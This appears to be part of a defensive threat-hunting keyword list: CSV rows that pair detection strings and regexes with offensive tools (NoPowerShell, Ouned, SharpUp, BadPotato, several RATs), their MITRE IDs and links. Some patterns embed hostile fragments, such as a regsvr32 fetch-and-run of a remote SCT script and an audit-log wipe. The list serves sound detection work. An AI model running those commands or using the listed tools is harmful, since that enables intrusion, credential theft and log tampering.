"*== NoPowerShell v* ==*",".{0,1000}\=\=\sNoPowerShell\sv.{0,1000}\s\=\=.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","20270"
"*--==[[ Andela Yuwono Priv8 Shell ]]==--*",".{0,1000}\-\-\=\=\[\[\sAndela\sYuwono\sPriv8\sShell\s\]\]\=\=\-\-.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","20271"
"*=== Cached GPP Password ===*",".{0,1000}\=\=\=\sCached\sGPP\sPassword\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20272"
"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*",".{0,1000}\=\=\=\sGENERATING\sMALICIOUS\sGROUP\sPOLICY\sTEMPLATE\s\=\=\=.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","20273"
"*=== LAUNCHING SMB SERVER AND WAITING FOR GPT REQUESTS ===*",".{0,1000}\=\=\=\sLAUNCHING\sSMB\sSERVER\sAND\sWAITING\sFOR\sGPT\sREQUESTS\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20274"
"*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","20275"
"*=== SharpUp: Running Privilege Escalation Checks ===*",".{0,1000}\=\=\=\sSharpUp\:\sRunning\sPrivilege\sEscalation\sChecks\s\=\=\=.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","20276"
"*=== SPOOFING THE GPLINK ATTRIBUTE OF THE TARGET OU ===*",".{0,1000}\=\=\=\sSPOOFING\sTHE\sGPLINK\sATTRIBUTE\sOF\sTHE\sTARGET\sOU\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20277"
"*=== WAITING (GPT REQUESTS WILL BE FORWARDED TO SMB SERVER) ===*",".{0,1000}\=\=\=\sWAITING\s\(GPT\sREQUESTS\sWILL\sBE\sFORWARDED\sTO\sSMB\sSERVER\)\s\=\=\=.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20278"
"*=== WAITING (SMB NTLM AUTHENTICATION COERCED TO *",".{0,1000}\=\=\=\sWAITING\s\(SMB\sNTLM\sAUTHENTICATION\sCOERCED\sTO\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20279"
"*===[[[ A Black Path Toward The Sun ]]]===*",".{0,1000}\=\=\=\[\[\[\sA\sBlack\sPath\sToward\sThe\sSun\s\]\]\]\=\=\=.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","20280"
"*=========== Havoc and msf revshell ========*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\sHavoc\sand\smsf\srevshell\s\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","20281"
"*======================== htran V%s =======================*",".{0,1000}\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\shtran\sV\%s\s\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=\=.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","20282"
"*===PARASITE INVOKE*",".{0,1000}\=\=\=PARASITE\sINVOKE.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","20283"
"*==> Python3 C&C server <==*",".{0,1000}\=\=\>\sPython3\sC\&C\sserver\s\<\=\=.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","20284"
"*==gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U*",".{0,1000}\=\=gCkV2Zh5WYNNXZB5SeoBXYyd2b0BXeyNkL5RXayV3YlNlLtVGdzl3U.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20285"
"*==gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gNyEDMx80UJpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20286"
"*==gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=gQDVkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20287"
"*==wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wcvJXZapjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20288"
"*==wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wMykDWJNlTBpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20289"
"*==wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wNTN0SQpjOdVGZv10ZulGZkFGUukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20290"
"*==wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W*",".{0,1000}\=\=wQCNkO60VZk9WTyVGawl2QukHawFmcn9GdwlncD5Se0lmc1NWZT5SblR3c5N1W.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#base64","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20291"
"*=Administrator.ccache*",".{0,1000}\=Administrator\.ccache.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","20292"
"*=imaohw*",".{0,1000}\=imaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20294"
"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*",".{0,1000}\=MSEXCEL.{0,1000}regsvr32\s\/s\s\/n\s\/u\s\/i\:http.{0,1000}\/SCTLauncher\.sct\sscrobj\.dll.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","20295"
"*=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC*",".{0,1000}\=ogIXFlckIzYIRCekEHMORiIgwWY2VmCpICcahHJVRCTkcVUyRie5YFJ3RiZkAnW4RidkIzYIRiYkcHJzRCZkcVUyRyYkcHJyMGSkICIsFmdlhCJ9gnC.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","20297"
"*=resu ten*",".{0,1000}\=resu\sten.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","20298"
"*> /var/log/audit/audit.log* rm -f .*",".{0,1000}\>\s\/var\/log\/audit\/audit\.log.{0,1000}\srm\s\-f\s\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","20299"
"*> chntpw Main Interactive Menu <*",".{0,1000}\>\schntpw\sMain\sInteractive\sMenu\s\<.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20300"
"*> msfinstall*",".{0,1000}\>\smsfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20301"
"*---------------------> SYSKEY CHECK <-----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\>\sSYSKEY\sCHECK\s\<\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20302"
"*> WELCOME TO THE TORCT WEB-CLIENT *",".{0,1000}\>\sWELCOME\sTO\sTHE\sTORCT\sWEB\-CLIENT\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20303"
"*>[ STARTING CRASH DUMP ACQUISITION ]<*",".{0,1000}\>\[\sSTARTING\sCRASH\sDUMP\sACQUISITION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","20304"
"*>[ STARTING NT HASHES EXTRACTION ]<*",".{0,1000}\>\[\sSTARTING\sNT\sHASHES\sEXTRACTION\s\]\<.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","20305"
"*>[BAD R.A.T.]-Company<*",".{0,1000}\>\[BAD\sR\.A\.T\.\]\-Company\<.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20306"
"*>\fuego-control*",".{0,1000}\>\\fuego\-control.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20307"
"*>\fuego-data*",".{0,1000}\>\\fuego\-data.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20308"
"*>\fuegoshell*",".{0,1000}\>\\fuegoshell.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#namedpipe","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","20309"
"*>\gsecdump_*",".{0,1000}\>\\gsecdump_.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A","20310"
"*>> Where to hide the payload? Select a number: *",".{0,1000}\>\>\sWhere\sto\shide\sthe\spayload\?\sSelect\sa\snumber\:\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","20311"
"*>1047@exploit.im<*",".{0,1000}\>1047\@exploit\.im\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20312"
"*>ADCSPwn<*",".{0,1000}\>ADCSPwn\<.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","20316"
"*>ADCSPwn<*",".{0,1000}\>ADCSPwn\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20317"
"*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20319"
"*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20320"
"*>ADFSDump<*",".{0,1000}\>ADFSDump\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20321"
"*>ADPassHunt<*",".{0,1000}\>ADPassHunt\<.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20322"
"*>ADSyncDecrypt<*",".{0,1000}\>ADSyncDecrypt\<.{0,1000}","offensive_tool_keyword","ADSyncDecrypt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20323"
"*>ADSyncDecrypt<*",".{0,1000}\>ADSyncDecrypt\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ADSyncDecrypt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20324"
"*>BadPotato<*",".{0,1000}\>BadPotato\<.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#productname","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","20340"
"*>BetterSafetyKatz<*",".{0,1000}\>BetterSafetyKatz\<.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#productname","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20346"
"*>Blackshades NET<*",".{0,1000}\>Blackshades\sNET\<.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","20347"
"*>blocketw<*",".{0,1000}\>blocketw\<.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#productname","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","20348"
"*>BrowserDataGrabber<*",".{0,1000}\>BrowserDataGrabber\<.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#productname","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","20351"
